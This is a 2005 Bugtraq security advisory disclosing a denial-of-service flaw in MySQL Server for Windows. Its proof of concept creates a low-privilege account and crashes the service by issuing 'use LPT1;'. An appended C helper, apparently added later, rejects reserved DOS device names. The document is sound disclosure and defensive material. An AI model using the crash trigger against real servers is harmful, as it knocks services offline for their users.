Denial of Service Vulnerability in MySQL Server for Windows

From: Luca Ercoli (io_at_lucaercoli.it)
Date: 03/15/05

    Date: 15 Mar 2005 18:47:16 -0000
    To: bugtraq@securityfocus.com
    
    

    Package: MySQL Database Server for Windows
    Auth: http://www.mysql.com/
    Version(s): 4.1.XX/4.0.XX/5.0.XX
    Vulnerability Type: Denial of Service

    Disclaimer:
    ==========

    The information is provided "as is" without warranty of any kind.
    The author of this issue shall not be held liable for any
    downtime, lost profits, or damages due to the information
    contained in this advisory.

    What’s MySQL:
    ============

    MySQL is a multi-user, multi-threaded relational database management system.
    The MySQL database server is the world's most popular open source database.

    Vulnerability Description:
    =========================

    A vulnerability exists in the way the application handles requests
    containing reserved MS-DOS device names (AUX, CON, COM1, LPT1 and PRN).
    This flaw allows an authenticated user with at least one of the
    following privileges granted globally (on *.*):

    - REFERENCES
    - CREATE TEMPORARY TABLES
    - GRANT OPTION
    - CREATE
    - SELECT

    to cause the service to fail.

    Proof of Concept:
    ================

    1- Create a user account:

    (connected as 'root')

    use mysql;
    INSERT INTO user (Host,User,Password) VALUES('%','customer',PASSWORD('customer'));

    2- Grant it one or more of the privileges listed above:

    (connected as 'root')

    GRANT CREATE TEMPORARY TABLES ON *.* TO 'customer'@'%';
    flush privileges;

    3- Connect to the server using the new account and 'use' the database 'LPT1':

    (connected as 'customer')
    use LPT1;

    Vendor Status:
    =============

     http://bugs.mysql.com/

     ID: 9148
     Updated by: Miguel Solorzano
     Reported by: Luca Ercoli
     User Type: User
     Status: Verified
     Severity: S2 (Serious)
     Category: Server
     Operating System: Windows
    -Version: 4.1.9
    +Version: 4.1.XX/4.0.XX/5.0.XX

    Credits:

    ---
    Luca Ercoli
    io [at] lucaercoli.it
    www.lucaercoli.it
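
A defensive check for the class of name this advisory describes, as an added example (not code from the advisory or from MySQL): `is_dos_device_name` is a hypothetical helper that a provisioning script or input filter could use to reject database names Windows would resolve to a device. It goes beyond the five names listed above and conservatively covers NUL, COM0-COM9 and LPT0-LPT9, plus the extension, colon and trailing-space forms.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not MySQL code): returns 1 if `name` would be
 * treated as a reserved DOS device name on Windows, 0 otherwise. */
int is_dos_device_name(const char *name)
{
    static const char *const fixed[] = { "CON", "PRN", "AUX", "NUL" };
    char base[8];
    size_t len, i;

    if (name == NULL)
        return 0;
    /* Only the part before the first '.' or ':' is compared, so
     * "PRN.txt" and "COM1:" are flagged as well. */
    len = strcspn(name, ".:");
    /* Trailing spaces are ignored when the name is matched. */
    while (len > 0 && name[len - 1] == ' ')
        len--;
    if (len < 3 || len > 4)
        return 0;
    /* Device names are case-insensitive: normalise to upper case. */
    for (i = 0; i < len; i++)
        base[i] = (char)toupper((unsigned char)name[i]);
    base[len] = '\0';

    if (len == 3) {
        for (i = 0; i < sizeof fixed / sizeof fixed[0]; i++)
            if (strcmp(base, fixed[i]) == 0)
                return 1;
        return 0;
    }
    /* Four characters: COM or LPT followed by one digit. */
    return (strncmp(base, "COM", 3) == 0 || strncmp(base, "LPT", 3) == 0)
           && isdigit((unsigned char)base[3]);
}

int main(void)
{
    /* Constructed sample database names, for illustration only. */
    const char *samples[] = { "LPT1", "aux", "PRN.txt", "customer", "mysql" };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-10s %s\n", samples[i],
               is_dos_device_name(samples[i]) ? "REJECT" : "ok");
    return 0;
}
```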
    
